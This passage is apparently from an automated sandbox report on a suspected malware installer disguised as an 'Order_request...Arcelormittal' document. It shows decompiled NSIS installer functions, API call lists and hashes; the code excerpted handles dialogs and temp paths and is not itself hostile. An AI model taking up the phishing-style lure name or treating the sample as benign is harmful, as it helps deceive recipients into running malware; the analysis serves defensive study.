                                                				if(_t18 != _t22) {
                                                					DeleteObject(_t18);
                                                				}
                                                				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t27 - 4));
                                                				return 0;
                                                			}

                                                APIs
                                                • GetDlgItem.USER32 ref: 00401D00
                                                • GetClientRect.USER32 ref: 00401D0D
                                                • LoadImageW.USER32 ref: 00401D2E
                                                • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
                                                • DeleteObject.GDI32(00000000), ref: 00401D4B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                • String ID:
                                                • API String ID: 1849352358-0
                                                • Opcode ID: 744784328c674175fcbcfcf0e9bbf26443557e854759898e5afcc3989039e9af
                                                • Instruction ID: b0c4edec147008cd01dbb3001b95c609c297ceb5d42f7dfd9ff58b90d4b754cd
                                                • Opcode Fuzzy Hash: 744784328c674175fcbcfcf0e9bbf26443557e854759898e5afcc3989039e9af
                                                • Instruction Fuzzy Hash: D2F0F472500504AFDB01DBE4DE88CEEBBBDEB48311B104476F501F51A1CA74DD018B38
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E007E10D3(WCHAR* _a4, intOrPtr _a8, short* _a12, int _a16) {
                                                				int _t11;
                                                				short* _t12;
                                                
                                                				_t12 = _a12;
                                                				_t11 = 0;
                                                				 *_t12 = 0;
                                                				if(lstrlenA(_a4) != _a8) {
                                                					lstrcpyW(_t12, _a4);
                                                				} else {
                                                					MultiByteToWideChar(0, 0, _a4, 0xffffffff, _t12, _a16);
                                                					_t11 = 1;
                                                				}
                                                				return _t11;
                                                			}


                                                APIs
                                                • lstrlenA.KERNEL32(?,740976928,740976928,?,007E1514,740976928,?,740976928,00000400), ref: 007E10E3
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000400,?,?,007E1514,740976928,?,740976928,00000400), ref: 007E10F9
                                                • lstrcpyW.KERNEL32 ref: 007E1106
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.512316824.00000000007E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007E0000, based on PE: true
                                                • Associated: 00000000.00000002.512304950.00000000007E0000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000000.00000002.512325440.00000000007E2000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000000.00000002.512337115.00000000007E3000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000000.00000002.512347213.00000000007E4000.00000002.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7e0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWidelstrcpylstrlen
                                                • String ID: 740976928$740976928
                                                • API String ID: 133274523-4290860111
                                                • Opcode ID: d663db363392e9607009793b4f3a56bb93599529aa83a40e7b56a59a985f4abd
                                                • Instruction ID: 3ed16c53e46084c296ef61552af4d9cbfa2604b4ca01221930d1e886cd450547
                                                • Opcode Fuzzy Hash: d663db363392e9607009793b4f3a56bb93599529aa83a40e7b56a59a985f4abd
                                                • Instruction Fuzzy Hash: D4E06D36101058BB8F125F46DC48CDF3F3EFF8A3727508014FA18961A0CB359952DBA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 77%
                                                			E0040494D(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                                				char _v68;
                                                				char _v132;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t23;
                                                				signed int _t24;
                                                				void* _t31;
                                                				void* _t33;
                                                				void* _t34;
                                                				void* _t44;
                                                				signed int _t46;
                                                				signed int _t50;
                                                				signed int _t52;
                                                				signed int _t53;
                                                				signed int _t55;
                                                
                                                				_t23 = _a16;
                                                				_t53 = _a12;
                                                				_t44 = 0xffffffdc;
                                                				if(_t23 == 0) {
                                                					_push(0x14);
                                                					_pop(0);
                                                					_t24 = _t53;
                                                					if(_t53 < 0x100000) {
                                                						_push(0xa);
                                                						_pop(0);
                                                						_t44 = 0xffffffdd;
                                                					}
                                                					if(_t53 < 0x400) {
                                                						_t44 = 0xffffffde;
                                                					}
                                                					if(_t53 < 0xffff3333) {
                                                						_t52 = 0x14;
                                                						asm("cdq");
                                                						_t24 = 1 / _t52 + _t53;
                                                					}
                                                					_t25 = _t24 & 0x00ffffff;
                                                					_t55 = _t24 >> 0;
                                                					_t46 = 0xa;
                                                					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
                                                				} else {
                                                					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
                                                					_t50 = 0;
                                                				}
                                                				_t31 = E00406054(_t44, _t50, _t55,  &_v68, 0xffffffdf);
                                                				_t33 = E00406054(_t44, _t50, _t55,  &_v132, _t44);
                                                				_t34 = E00406054(_t44, _t50, 0x7a1f40, 0x7a1f40, _a8);
                                                				wsprintfW(_t34 + lstrlenW(0x7a1f40) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
                                                				return SetDlgItemTextW( *0x7a7a18, _a4, 0x7a1f40);
                                                			}


                                                APIs
                                                • lstrlenW.KERNEL32(007A1F40,007A1F40,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 004049EE
                                                • wsprintfW.USER32 ref: 004049F7
                                                • SetDlgItemTextW.USER32 ref: 00404A0A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: ItemTextlstrlenwsprintf
                                                • String ID: %u.%u%s%s
                                                • API String ID: 3540041739-3551169577
                                                • Opcode ID: ce9979b4b01424170f7f3781fe10c2b71c9da1ea9fb3152acdeb899b4a45e53b
                                                • Instruction ID: b64f68613590d753eae0667b1f9c1485f74a5586c4fdc6504f9435c9407cab2f
                                                • Opcode Fuzzy Hash: ce9979b4b01424170f7f3781fe10c2b71c9da1ea9fb3152acdeb899b4a45e53b
                                                • Instruction Fuzzy Hash: EC11D87360412827EB10A66D9C41EDF329C9B82334F150237FA65F21D1EA78C82682E8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 53%
                                                			E00405AEE(void* __eflags, intOrPtr _a4) {
                                                				int _t11;
                                                				signed char* _t12;
                                                				intOrPtr _t18;
                                                				intOrPtr* _t21;
                                                				signed int _t23;
                                                
                                                				E00406032(0x7a4748, _a4);
                                                				_t21 = E00405A91(0x7a4748);
                                                				if(_t21 != 0) {
                                                					E004062C6(_t21);
                                                					if(( *0x7a8a58 & 0x00000080) == 0) {
                                                						L5:
                                                						_t23 = _t21 - 0x7a4748 >> 1;
                                                						while(1) {
                                                							_t11 = lstrlenW(0x7a4748);
                                                							_push(0x7a4748);
                                                							if(_t11 <= _t23) {
                                                								break;
                                                							}
                                                							_t12 = E00406375();
                                                							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                                                								E00405A32(0x7a4748);
                                                								continue;
                                                							} else {
                                                								goto L1;
                                                							}
                                                						}
                                                						E004059E6();
                                                						return 0 | GetFileAttributesW(??) != 0xffffffff;
                                                					}
                                                					_t18 =  *_t21;
                                                					if(_t18 == 0 || _t18 == 0x5c) {
                                                						goto L1;
                                                					} else {
                                                						goto L5;
                                                					}
                                                				}
                                                				L1:
                                                				return 0;
                                                			}


                                                APIs
                                                  • Part of subcall function 00406032: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,0040332D,Overcaustically Setup,NSIS Error), ref: 0040603F
                                                  • Part of subcall function 00405A91: CharNextW.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp,0040A300,00405B05,C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp,C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp,772EFAA0,?,C:\Users\user~1\AppData\Local\Temp\,00405843,?,772EFAA0,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe"), ref: 00405A9F
                                                  • Part of subcall function 00405A91: CharNextW.USER32(00000000), ref: 00405AA4
                                                  • Part of subcall function 00405A91: CharNextW.USER32(00000000), ref: 00405ABC
                                                • lstrlenW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp,00000000,C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp,C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp,772EFAA0,?,C:\Users\user~1\AppData\Local\Temp\,00405843,?,772EFAA0,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe"), ref: 00405B47
                                                • GetFileAttributesW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp,C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp,C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp,C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp,C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp,C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp,00000000,C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp,C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp,772EFAA0,?,C:\Users\user~1\AppData\Local\Temp\,00405843,?,772EFAA0,C:\Users\user~1\AppData\Local\Temp\), ref: 00405B57
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                • String ID: C:\Users\user~1\AppData\Local\Temp\$C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp
                                                • API String ID: 3248276644-2759061382
                                                • Opcode ID: 1c109e48d901a23ea14b6098b96b6ff6b364b8c8cfe64631121789c2790142ee
                                                • Instruction ID: 3bddcdf43bb23baaa909825d7db9bcd58a82d3117edc1a0c43d32c447e9df16d
                                                • Opcode Fuzzy Hash: 1c109e48d901a23ea14b6098b96b6ff6b364b8c8cfe64631121789c2790142ee
                                                • Instruction Fuzzy Hash: F4F0F429104D6216C232723A1C49AAF3564CF92364B1A063FBC51B12C1DF3CBD42CCAE
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00405A91(WCHAR* _a4) {
                                                				WCHAR* _t5;
                                                				short* _t7;
                                                				WCHAR* _t10;
                                                				short _t11;
                                                				WCHAR* _t12;
                                                				void* _t14;
                                                
                                                				_t12 = _a4;
                                                				_t10 = CharNextW(_t12);
                                                				_t5 = CharNextW(_t10);
                                                				_t11 =  *_t12;
                                                				if(_t11 == 0 ||  *_t10 != 0x3a || _t10[1] != 0x5c) {
                                                					if(_t11 != 0x5c || _t12[1] != _t11) {
                                                						L10:
                                                						return 0;
                                                					} else {
                                                						_t14 = 2;
                                                						while(1) {
                                                							_t14 = _t14 - 1;
                                                							_t7 = E00405A13(_t5, 0x5c);
                                                							if( *_t7 == 0) {
                                                								goto L10;
                                                							}
                                                							_t5 = _t7 + 2;
                                                							if(_t14 != 0) {
                                                								continue;
                                                							}
                                                							return _t5;
                                                						}
                                                						goto L10;
                                                					}
                                                				} else {
                                                					return CharNextW(_t5);
                                                				}
                                                			}


                                                APIs
                                                • CharNextW.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp,0040A300,00405B05,C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp,C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp,772EFAA0,?,C:\Users\user~1\AppData\Local\Temp\,00405843,?,772EFAA0,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe"), ref: 00405A9F
                                                • CharNextW.USER32(00000000), ref: 00405AA4
                                                • CharNextW.USER32(00000000), ref: 00405ABC
                                                Strings
                                                • C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp, xrefs: 00405A92
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: CharNext
                                                • String ID: C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp
                                                • API String ID: 3213498283-1732896309
                                                • Opcode ID: 1b3bb70d064d2828b3f020bf6a5482fb991db3eaf72ecbcdc1d8bf2f545e9475
                                                • Instruction ID: 0cb906ce55498ce86d0db88686860b14f8f146b66f9f6c0e4bde91ccc4fe9cfd
                                                • Opcode Fuzzy Hash: 1b3bb70d064d2828b3f020bf6a5482fb991db3eaf72ecbcdc1d8bf2f545e9475
                                                • Instruction Fuzzy Hash: E2F09611B10F1195DF3176545CC5A7B6AB8EB94354B04863BD602B72C0D7B84D818F99
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 58%
                                                			E004059E6(WCHAR* _a4) {
                                                				WCHAR* _t9;
                                                
                                                				_t9 = _a4;
                                                				_push( &(_t9[lstrlenW(_t9)]));
                                                				_push(_t9);
                                                				if( *(CharPrevW()) != 0x5c) {
                                                					lstrcatW(_t9, 0x40a014);
                                                				}
                                                				return _t9;
                                                			}

                                                APIs
                                                • lstrlenW.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,0040326A,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004034A9), ref: 004059EC
                                                • CharPrevW.USER32(?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,0040326A,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004034A9), ref: 004059F6
                                                • lstrcatW.KERNEL32(?,0040A014), ref: 00405A08
                                                Strings
                                                • C:\Users\user~1\AppData\Local\Temp\, xrefs: 004059E6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: CharPrevlstrcatlstrlen
                                                • String ID: C:\Users\user~1\AppData\Local\Temp\
                                                • API String ID: 2659869361-2382934351
                                                • Opcode ID: 69ce20dac70bd98cff0fbc611a97eee619d910519d07cd3d76554ab653056bec
                                                • Instruction ID: ee04230c76b470484a65779322a078522fef8bc0a4cae86812832761b4080375
                                                • Opcode Fuzzy Hash: 69ce20dac70bd98cff0fbc611a97eee619d910519d07cd3d76554ab653056bec
                                                • Instruction Fuzzy Hash: 30D0A7711019306AC121EB449C04DDF629CAF45300341443FF501B30A2C77C5D618BFE
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00402D8A(intOrPtr _a4) {
                                                				long _t2;
                                                				struct HWND__* _t3;
                                                				struct HWND__* _t6;
                                                
                                                				if(_a4 == 0) {
                                                					__eflags =  *0x7976f8; // 0x0
                                                					if(__eflags == 0) {
                                                						_t2 = GetTickCount();
                                                						__eflags = _t2 -  *0x7a8a4c;
                                                						if(_t2 >  *0x7a8a4c) {
                                                							_t3 = CreateDialogParamW( *0x7a8a40, 0x6f, 0, E00402D04, 0);
                                                							 *0x7976f8 = _t3;
                                                							return ShowWindow(_t3, 5);
                                                						}
                                                						return _t2;
                                                					} else {
                                                						return E00406444(0);
                                                					}
                                                				} else {
                                                					_t6 =  *0x7976f8; // 0x0
                                                					if(_t6 != 0) {
                                                						_t6 = DestroyWindow(_t6);
                                                					}
                                                					 *0x7976f8 = 0;
                                                					return _t6;
                                                				}
                                                			}

                                                APIs
                                                • DestroyWindow.USER32(00000000,00000000,00402F6A,00000001,?,?,00000000,00403517,?), ref: 00402D9D
                                                • GetTickCount.KERNEL32 ref: 00402DBB
                                                • CreateDialogParamW.USER32 ref: 00402DD8
                                                • ShowWindow.USER32(00000000,00000005,?,?,00000000,00403517,?), ref: 00402DE6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                • String ID:
                                                • API String ID: 2102729457-0
                                                • Opcode ID: 1b6a587a400701eabc8229d3e3b69e73e671933e3945777b2463f190b987498e
                                                • Instruction ID: 43aedd9bd01b98b6f78ee00b952d30abd1abf30aba01f835b52ba634ff97d244
                                                • Opcode Fuzzy Hash: 1b6a587a400701eabc8229d3e3b69e73e671933e3945777b2463f190b987498e
                                                • Instruction Fuzzy Hash: 1AF05E30516A22EBC6916B14FF4DE8B7B64AB80B1171684BBF051B11E4CA7C0C82CB9C
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00403B51(void* __ecx, void* __eflags) {
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed short _t6;
                                                				intOrPtr _t11;
                                                				signed int _t13;
                                                				signed int _t16;
                                                				signed short* _t18;
                                                				signed int _t20;
                                                				signed short* _t23;
                                                				intOrPtr _t25;
                                                				signed int _t26;
                                                				intOrPtr* _t27;
                                                				WCHAR* _t24; // declaration omitted by the decompiler; holds L"1033" below
                                                
                                                				_t24 = L"1033";
                                                				_t13 = 0xffff;
                                                				_t6 = E00405F92(__ecx, L"1033");
                                                				while(1) {
                                                					_t26 =  *0x7a8a84;
                                                					if(_t26 == 0) {
                                                						goto L7;
                                                					}
                                                					_t16 =  *( *0x7a8a50 + 0x64);
                                                					_t20 =  ~_t16;
                                                					_t18 = _t16 * _t26 +  *0x7a8a80;
                                                					while(1) {
                                                						_t18 = _t18 + _t20;
                                                						_t26 = _t26 - 1;
                                                						if((( *_t18 ^ _t6) & _t13) == 0) {
                                                							break;
                                                						}
                                                						if(_t26 != 0) {
                                                							continue;
                                                						}
                                                						goto L7;
                                                					}
                                                					 *0x7a7a20 = _t18[1];
                                                					 *0x7a8ae8 = _t18[3];
                                                					_t23 =  &(_t18[5]);
                                                					if(_t23 != 0) {
                                                						 *0x7a7a1c = _t23;
                                                						E00405F79(_t24,  *_t18 & 0x0000ffff);
                                                						SetWindowTextW( *0x7a1f20, E00406054(_t13, _t24, _t26, "Overcaustically Setup", 0xfffffffe));
                                                						_t11 =  *0x7a8a6c;
                                                						_t27 =  *0x7a8a68;
                                                						if(_t11 == 0) {
                                                							L15:
                                                							return _t11;
                                                						}
                                                						_t25 = _t11;
                                                						do {
                                                							_t11 =  *_t27;
                                                							if(_t11 != 0) {
                                                								_t11 = E00406054(_t13, _t25, _t27, _t27 + 0x18, _t11);
                                                							}
                                                							_t27 = _t27 + 0x818;
                                                							_t25 = _t25 - 1;
                                                						} while (_t25 != 0);
                                                						goto L15;
                                                					}
                                                					L7:
                                                					if(_t13 != 0xffff) {
                                                						_t13 = 0;
                                                					} else {
                                                						_t13 = 0x3ff;
                                                					}
                                                				}
                                                			}

                                                APIs
                                                • SetWindowTextW.USER32(00000000,Overcaustically Setup), ref: 00403BE9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: TextWindow
                                                • String ID: 1033$Overcaustically Setup
                                                • API String ID: 530164218-3667396766
                                                • Opcode ID: 73e21ad5ffa932d89d7705433f4a385169624a21009188ee896e041d0e727551
                                                • Instruction ID: e987bbb99f4ce20eb3fe8b814340f1a9c458372fd2df2122c6df2ee7e0325558
                                                • Opcode Fuzzy Hash: 73e21ad5ffa932d89d7705433f4a385169624a21009188ee896e041d0e727551
                                                • Instruction Fuzzy Hash: 1D11D132B046109BC724DF15DC80A7777BCEBC6719728C17BE901A73A2DA3DAE018799
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 89%
                                                			E00405105(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                				int _t15;
                                                				long _t16;
                                                
                                                				_t15 = _a8;
                                                				if(_t15 != 0x102) {
                                                					if(_t15 != 0x200) {
                                                						_t16 = _a16;
                                                						L7:
                                                						if(_t15 == 0x419 &&  *0x7a1f2c != _t16) {
                                                							_push(_t16);
                                                							_push(6);
                                                							 *0x7a1f2c = _t16;
                                                							E00404ADB();
                                                						}
                                                						L11:
                                                						return CallWindowProcW( *0x7a1f34, _a4, _t15, _a12, _t16);
                                                					}
                                                					if(IsWindowVisible(_a4) == 0) {
                                                						L10:
                                                						_t16 = _a16;
                                                						goto L11;
                                                					}
                                                					_t16 = E00404A5B(_a4, 1);
                                                					_t15 = 0x419;
                                                					goto L7;
                                                				}
                                                				if(_a12 != 0x20) {
                                                					goto L10;
                                                				}
                                                				E00404142(0x413);
                                                				return 0;
                                                			}

                                                APIs
                                                • IsWindowVisible.USER32 ref: 00405134
                                                • CallWindowProcW.USER32(?,?,?,?), ref: 00405185
                                                  • Part of subcall function 00404142: SendMessageW.USER32(000103AE,00000000,00000000,00000000), ref: 00404154
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
